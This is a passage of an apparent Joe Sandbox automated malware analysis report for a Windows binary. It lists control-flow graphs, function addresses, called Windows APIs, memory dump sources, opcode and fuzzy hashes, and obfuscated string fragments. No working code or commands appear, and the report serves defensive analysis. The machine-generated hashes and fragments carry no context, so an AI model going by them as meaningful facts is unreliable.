1663->1686 1664->1612 1678 7ff7d5076da4-7ff7d5076dcf 1664->1678 1687 7ff7d5076f4d 1665->1687 1688 7ff7d5076f53-7ff7d5076f5f 1665->1688 1666->1655 1683 7ff7d5076ea5-7ff7d5076ead 1666->1683 1667->1612 1690 7ff7d5076bf2-7ff7d5076c03 1667->1690 1668->1612 1679 7ff7d5076df9-7ff7d5076dfe 1668->1679 1669->1687 1689 7ff7d5076f7f 1669->1689 1693 7ff7d5076fdc-7ff7d5076ff0 1670->1693 1671->1612 1672->1693 1673->1612 1696 7ff7d5076cbd-7ff7d5076cc2 1674->1696 1697 7ff7d5076cb8 1674->1697 1675->1612 1676->1612 1700 7ff7d5076d3e-7ff7d5076d43 1676->1700 1677->1612 1678->1612 1701 7ff7d5076dd5-7ff7d5076dda 1678->1701 1679->1612 1680->1612 1683->1655 1699 7ff7d5076eb3 1683->1699 1684->1612 1686->1612 1687->1688 1688->1612 1689->1688 1690->1612 1691->1612 1692->1691 1696->1612 1697->1696 1699->1612 1700->1612 1701->1612
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                • Instruction ID: 71ba638a93ce9081f123d5ed17a200e95b224c779db956b3afc945d1a9f82088
                                                • Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                • Instruction Fuzzy Hash: 4CC1C726B0CA5587E6685A38A49013DA790DF54B50FF4413BEDEF87F98CE6CE8404B21
                                                Function 00007FF7D50E5680 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1717 7ff7d50e5680-7ff7d50e56a4 1718 7ff7d50e56c0-7ff7d50e56c5 1717->1718 1719 7ff7d50e56e0-7ff7d50e56e5 1718->1719 1720 7ff7d50e56c7-7ff7d50e56cc 1718->1720 1723 7ff7d50e5707-7ff7d50e572d RtlAllocateHeap 1719->1723 1724 7ff7d50e56e7-7ff7d50e56ec 1719->1724 1721 7ff7d50e56a6-7ff7d50e56bc call 7ff7d50e6260 1720->1721 1722 7ff7d50e56ce-7ff7d50e56d3 1720->1722 1721->1718 1726 7ff7d50e56d5-7ff7d50e56da 1722->1726 1727 7ff7d50e572f-7ff7d50e5734 1722->1727 1723->1718 1724->1718 1728 7ff7d50e56ee-7ff7d50e5705 1724->1728 1726->1718 1727->1718 1729 7ff7d50e5736-7ff7d50e5740 1727->1729 1728->1718
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                • Instruction ID: 2767647e51cf73a9ceca9276ac054d6a1ca4e8f8d11d60aeb2e407b8053cabe6
                                                • Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                • Instruction Fuzzy Hash: 2711862591CB4983DA606F25B88113EE391FB89BA4FE00933EDCDC7364CE2CD5504B10
                                                Function 00007FF7D50E13D0 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1731 7ff7d50e13d0-7ff7d50e13ea 1732 7ff7d50e141d-7ff7d50e1423 1731->1732 1733 7ff7d50e1425-7ff7d50e142b 1732->1733 1734 7ff7d50e13f0-7ff7d50e1418 IsDlgButtonChecked 1732->1734 1733->1732 1735 7ff7d50e142d-7ff7d50e144a 1733->1735 1734->1732
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: ButtonChecked
                                                • String ID:
                                                • API String ID: 1719414920-0
                                                • Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                • Instruction ID: 367af0bd229ec59fa16e7276f7139b2f22617899cf24df98d0d00ad17a723786
                                                • Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                • Instruction Fuzzy Hash: 9DF0C267B0D28045EA346635F54027E9A609B9DFF4FA80476ED8D47BA8CA1DC6818700
                                                Function 00007FF7D50E5750 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1736 7ff7d50e5750-7ff7d50e5789 1737 7ff7d50e57ac-7ff7d50e57b2 1736->1737 1738 7ff7d50e57b4-7ff7d50e57ba 1737->1738 1739 7ff7d50e5790-7ff7d50e57a7 RtlAllocateHeap 1737->1739 1738->1737 1740 7ff7d50e57bc-7ff7d50e57ca 1738->1740 1739->1737
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                • Instruction ID: 1052ebfec99ff8e912bf548af618242531184f4d95a1f1284d522c7346e92ba0
                                                • Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                • Instruction Fuzzy Hash: 8AF01225629B48C6DA989B15F8D026DB768F7C8B90F901426FE8E83B68DF3DC4604710
                                                Function 00007FF7D50E5620 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1741 7ff7d50e5620-7ff7d50e564b 1742 7ff7d50e5666-7ff7d50e566b 1741->1742 1743 7ff7d50e5650-7ff7d50e5661 RtlDeleteBoundaryDescriptor 1742->1743 1744 7ff7d50e566d-7ff7d50e5672 1742->1744 1743->1742 1744->1742 1745 7ff7d50e5674-7ff7d50e5679 1744->1745
                                                APIs
                                                • RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF7D507B179), ref: 00007FF7D50E565F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: BoundaryDeleteDescriptor
                                                • String ID:
                                                • API String ID: 3203483114-0
                                                • Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                • Instruction ID: bef7713afd72aa4e5b16621f55125d186c929ad285863813435fb909fcb6ca8f
                                                • Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                • Instruction Fuzzy Hash: 73E0E521A0CB49C6DA60972AF44012DA391B78DF90FA84632DD8C83334DE2CC2824A00
                                                Function 00007FF7D50E5C40 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1746 7ff7d50e5c40-7ff7d50e5c5f 1747 7ff7d50e5c8f-7ff7d50e5c95 1746->1747 1748 7ff7d50e5c70-7ff7d50e5c8a RtlAllocateHeap 1747->1748 1749 7ff7d50e5c97-7ff7d50e5c9d 1747->1749 1748->1747 1749->1747 1750 7ff7d50e5c9f-7ff7d50e5cad 1749->1750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                • Instruction ID: 60a199f6b18ed4f0952efab86d31946b044336f427acbcb31764c685af54f034
                                                • Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                • Instruction Fuzzy Hash: 12F03025619B448ADA789715E8E023DA7A6EB8CB44FD00567EE4E53768CE3CD4518A10
                                                Function 00007FF7D50C2F40 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1751 7ff7d50c2f40-7ff7d50c2f52 1752 7ff7d50c2f74-7ff7d50c2f7a 1751->1752 1753 7ff7d50c2f60-7ff7d50c2f6f GetFileAttributesA 1752->1753 1754 7ff7d50c2f7c-7ff7d50c2f82 1752->1754 1753->1752 1754->1752 1755 7ff7d50c2f84-7ff7d50c2f94 1754->1755
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                • Instruction ID: f238445c64d6cf803b0b08c206fef2ae104e280971cd0df2c267152f565cdbe4
                                                • Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                • Instruction Fuzzy Hash: 22E0D80691D29683E5381235205107DAB615F97B54FE80336EAEE51AD4CA0DCA575A14

                                                Non-executed Functions

                                                Function 00007FF7D50AB6B0 Relevance: 48.0, Strings: 35, Instructions: 4292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ~{$2>"$2>"$Pw3$Pw3$Pw3$~{$~{$)OqW$*OqW$*OqW$+CB$+CB$6j]U$6j]U$I"l[$J"l[$J"l[$e@~$f@~$f@~$n,9T$n^ m$n^ m$o,9T$o,9T$xYjl$xYjl$zB/$zB/$zB/$()m$()m$XdU$XdU
                                                • API String ID: 0-2338440668
                                                • Opcode ID: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
                                                • Instruction ID: 81243b94b84714cf43cf9aff950b19e464b3bd7442829f7f3f92a1f6ecf932fc
                                                • Opcode Fuzzy Hash: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
                                                • Instruction Fuzzy Hash: 3293C736A0C7C587EA759B28A6903BEB391EB94B80FD04537DE8DC7794CE6CD4408B61
                                                Function 00007FF7D5099830 Relevance: 39.6, Strings: 29, Instructions: 3345COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -gq|$-gq|$-gq|$0Ki$0Ki$1\Vg$1\Vg$E<i$E<i$J}m$J}m$O\V$O\V$^\~H$_\~H$_\~H$iH>l$jH>l$jH>l$lRE0$lRE0$sS.$tS.$tS.$z>J$z>J$z>J$fC$fC
                                                • API String ID: 0-1980736421
                                                • Opcode ID: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                • Instruction ID: 9b840359a8a4b5e7c2b173d8610146f2f9fa4534f334a05fb92ee5675d369ed3
                                                • Opcode Fuzzy Hash: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                • Instruction Fuzzy Hash: A973EC26A08BC68BDB785F3998903FD6391EB44B48FD4053BCE5E4BB98CF299540CB51
                                                Function 00007FF7D5071920 Relevance: 39.4, Strings: 30, Instructions: 1904COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ']u$(]u$(]u$7\q $8\q $8\q $;3RB$<3RB$<3RB$G#p$G#p$Mc^m$Nc^m$Nc^m$Wc,$Wc,$X~wo$X~wo$a[`S$b[`S$b[`S$k=5$k=5$kwEb$kwEb$td8$ud8$ud8$DcW$DcW
                                                • API String ID: 0-67992731
                                                • Opcode ID: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
                                                • Instruction ID: 5f75acbfc8908f41920535f2ad7596bf5dac2928d5577358b77f7c33be4e218c
                                                • Opcode Fuzzy Hash: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
                                                • Instruction Fuzzy Hash: 5003D936A0C58287EAB49A38A0807BEE7D09B55B90FE40537DDDDC77D4CE2CE9418B61
                                                Function 00007FF7D50E8AB0 Relevance: 35.3, APIs: 3, Strings: 16, Instructions: 2093COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
                                                • API String ID: 0-202705158
                                                • Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                • Instruction ID: 578874d3243fc036eb92a790c7645b5e3fd715261c17054adb9d9c689d62081a
                                                • Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                • Instruction Fuzzy Hash: 2D23C826A15BC98BDB789F35D8942FD63A0EF49B84FE04137DE1E1BB64CE3896418311
                                                Function 00007FF7D508D390 Relevance: 30.4, Strings: 23, Instructions: 1655COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
                                                • API String ID: 0-4187098220
                                                • Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                • Instruction ID: c34df515e8d72180b872194e50cfc9ef6ae6bcb8a13ed5ce2140a2b735a51154
                                                • Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                • Instruction Fuzzy Hash: F7F29A36A0C68687EA747629A484E7EEBD0EB84B54FD01633ED4DC7799CF2CE4408B51
                                                Function 00007FF7D5061450 Relevance: 27.9, Strings: 21, Instructions: 1671COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F~_$F~_$F~_$F~_$3_0$3_0$3_0$3_0$6$7$7$gkp.$gkp.$lUHm$lUHm$bU$bU$bU$y,P$y,P$y,P
                                                • API String ID: 0-4281497918
                                                • Opcode ID: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
                                                • Instruction ID: 947a7593b9e69217b43937835ba3a6a756237ce40c3a4d44854aa2bc8f03cada
                                                • Opcode Fuzzy Hash: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
                                                • Instruction Fuzzy Hash: 88F29437F0C1D287D6746B257540EBEE794E764B98F850623CE9923F98CA3CAD408B91
                                                Function 00007FF7D5090740 Relevance: 27.1, Strings: 21, Instructions: 864COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
                                                • API String ID: 0-2622637242
                                                • Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                • Instruction ID: 5a53b64226593a12c82de85f1428bb2ba7af1396abb6d35abff53930ddddec16
                                                • Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                • Instruction Fuzzy Hash: 1982B82DF0C78587EA749629A19427EF291EB48B61FD88133DE9D8779CCE2CD4408F91
                                                Function 00007FF7D506A0F0 Relevance: 26.4, Strings: 20, Instructions: 1378COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %G1$&G1$&G1$((LY$((LY$79|E$79|E$WkZ$XkZ$XkZ$n;_k$n;_k$sM|x$tM|x$tM|x$tM|x$tM|x$&My$&My$&My
                                                • API String ID: 0-1474312542
                                                • Opcode ID: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
                                                • Instruction ID: a9a1907a26b5d91f7bfd1ee4da055cbf09f30e1769b830890792b16a938d2988
                                                • Opcode Fuzzy Hash: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
                                                • Instruction Fuzzy Hash: EAD2C836B4C786CBEB746E7998802FD6290EB19B54FE04637DE0DCB794CE29D9908311
                                                Function 00007FF7D50664A0 Relevance: 26.3, Strings: 19, Instructions: 2521COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
                                                • API String ID: 0-3286678768
                                                • Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                • Instruction ID: 93cdaec6f6f7de7300a428dcd25c184c7619327020e4d33873aa94c90687ca77
                                                • Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                • Instruction Fuzzy Hash: 9833EB36B0C78587EE789635A09127EE391EF84B90FD0023BDE9E47B98DE2DD5408B51
                                                Function 00007FF7D50A1510 Relevance: 25.2, Strings: 19, Instructions: 1480COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (M$(M$);.0N^s$J]M+$J]M+$\7Zs$]7Zs$]7Zs$dn$dn$yN7w$zN7w$zN7w$zN7w$q}'$q}'$q}'$q}'$q}'
                                                • API String ID: 0-43781059
                                                • Opcode ID: d2bc5af13dff40c9f61f9086366e939f88c01156ca9a17152a2cb77dbb1f1692
                                                • Instruction ID: 00fef622e6080fd8a9f99337e4f9e22d7190be47913488d74e4d1fa213343c8d
                                                • Opcode Fuzzy Hash: d2bc5af13dff40c9f61f9086366e939f88c01156ca9a17152a2cb77dbb1f1692
                                                • Instruction Fuzzy Hash: 3AD20C36A0C68287EA749739A59027EE390EB54B50FD04137EE5EC7B94DF2CE9408B71
                                                Function 00007FF7D50BCC40 Relevance: 23.6, Strings: 18, Instructions: 1145COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .!)5$.!)5$Rs<i$Rs<i$TQm*$UQm*$UQm*$UQm*$hF{h$iF{h$iF{h$iF{h$unordered_map/set too long$~ec$~ec$~ec$~ec$~ec
                                                • API String ID: 0-1542828796
                                                • Opcode ID: 677a04d54593f28023c93bcf9b6fa69eef5f8503c591345dc315b4b68ef5763c
